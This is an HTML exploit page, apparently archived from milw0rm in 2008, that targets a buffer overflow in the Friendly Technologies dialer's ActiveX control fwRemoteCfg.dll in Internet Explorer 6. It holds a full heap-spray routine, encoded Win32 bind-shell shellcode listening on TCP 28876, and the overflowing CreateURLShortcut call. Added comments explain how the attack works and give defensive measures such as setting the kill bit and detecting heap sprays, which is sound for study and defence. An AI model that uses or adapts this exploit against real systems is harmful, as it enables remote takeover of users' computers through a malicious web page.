<!--
"Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs,
who give the software to their customers on CD so they have less trouble setting up their connections.
They also provide remote configuration solutions -- not the best idea, if you ask me.
An overflow exists in fwRemoteCfg.dll provided with the dialer,
an example of the dialer can be found here:
==========================================================
|| Greetz to the binaryvision crew ||
|| Come visit @ http://www.binaryvision.org.il ||
|| or IRC at irc.nix.co.il / #binaryvision ||
==========================================================
* Tested on WinXP SP2 using IE6.
** For Education ONLY!
*** Written by spdr. (spdr01 [at] gmail.com)
-->
<html>
<title>Friendly Technologies - wayyy too friendly...</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id="sucker"></object>
<input type="button" value="Exploit!" onClick="exploit()">
<script>
/**
 * Handler for the "Exploit!" button in the markup above.
 *
 * What the visible code does, in order: (1) builds many copies of a NOP
 * slide followed by the shellcode string and parks them in a global array,
 * so that (per the author's comments) the address 0x0C0C0C0C lands inside
 * one of those copies; (2) builds a string of 800 "A" characters followed by
 * four 0x0C characters (the same byte value as the sprayed address);
 * (3) passes that string as the third argument of CreateURLShortcut on the
 * ActiveX object with id "sucker" (CLSID F4A06697-C0E7-4BB6-8C3B-E01016A4408B
 * in the <object> tag). The header comment names fwRemoteCfg.dll as the
 * component with the overflow and the shellcode as a bind shell on TCP 28876.
 *
 * Defensive notes: nothing here works unless a web page can instantiate that
 * control, so setting the ActiveX kill bit for the CLSID (or removing the
 * control) neutralises the page. The combination of large unescape("%u...")
 * strings, repeated self-concatenation into ~1 MB strings, and the constant
 * 0x0C0C0C0C is a classic IE heap-spray pattern worth alerting on in web
 * content inspection; the roughly 192 MB of strings allocated below is also
 * a visible memory spike in the browser process.
 *
 * `memory` and `k` are assigned without `var`, so they become globals on
 * `window`. The sprayed strings must stay reachable for the spray to have
 * any effect, so the leak is presumably intentional or at least harmless.
 */
function exploit() {
var Evil = ""; // Our Evil Buffer
var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address when not in the 0x00 - 0x7F range :(
// Need to use heap spray rather than overwrite EIP ...

// Skyland win32 bindshell (28876/tcp) shellcode
// %uXXXX escapes decode to one UTF-16 code unit each, i.e. two bytes of shellcode per escape.
var ShellCode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

var payLoadSize = ShellCode.length * 2; // Size of the shellcode -- .length counts UTF-16 code units, hence *2 for bytes
var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it shorter.

var spraySlide = unescape("%u9090%u9090"); // Nop slide
var heapHdrSize = 0x38; // size of heap header blocks in MSIE, hopefully.
var BlockSize = 0x100000; // Size of each block
// Chosen so that slide bytes + shellcode bytes + the assumed 0x38-byte header add up to exactly BlockSize.
var SlideSize = BlockSize - (payLoadSize + heapHdrSize); // Size of the Nop slide
// Not an integer (about 191.75), so the loop below runs 192 times.
var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of blocks

spraySlide = MakeNopSlide(spraySlide, SlideSize); // Create our slide

// [heap header][nopslide][shellcode]
// Implicit globals (no `var`): keeps the ~1 MB strings alive after this function returns.
memory = new Array();
for (k = 0; k < heapBlocks; k++)
memory[k] = spraySlide + ShellCode;

// Create Evil Buffer
// 800 "A" characters, then the four 0x0C characters matching SprayToAddress.
while(Evil.length < 800)
Evil += "A";
Evil += DamnIE;

// Pwn
// The oversized third argument is what the header comment says overflows inside fwRemoteCfg.dll.
// "con" is a reserved DOS device name, which is why the author expects no file to be written.
sucker.CreateURLShortcut("con", "con", Evil, 1); // Using 'con' as filename, we dont really want to make a file.
}
/**
 * Grow `spraySlide` by repeated self-concatenation until its byte length
 * (length * 2, since .length counts UTF-16 code units) is at least SlideSize,
 * then cut it back to exactly SlideSize / 2 code units.
 *
 * @param {string} spraySlide - seed string; the caller passes the "%u9090%u9090" slide.
 * @param {number} SlideSize - target size in bytes. A fractional SlideSize / 2 is
 *   truncated by substring; a value <= 0 yields "".
 * @returns {string} the slide padded (or trimmed) to SlideSize / 2 code units.
 *
 * The doubling is geometric, so reaching the ~1 MB block used by exploit()
 * takes fewer than 20 iterations. If SlideSize is already <= spraySlide.length * 2
 * the loop body never runs and the seed is just truncated.
 */
function MakeNopSlide(spraySlide, SlideSize){
while(spraySlide.length * 2 < SlideSize)
spraySlide += spraySlide;
spraySlide = spraySlide.substring(0, SlideSize / 2);
return spraySlide;
}
</script>
</html>
# milw0rm.com [2008-08-28]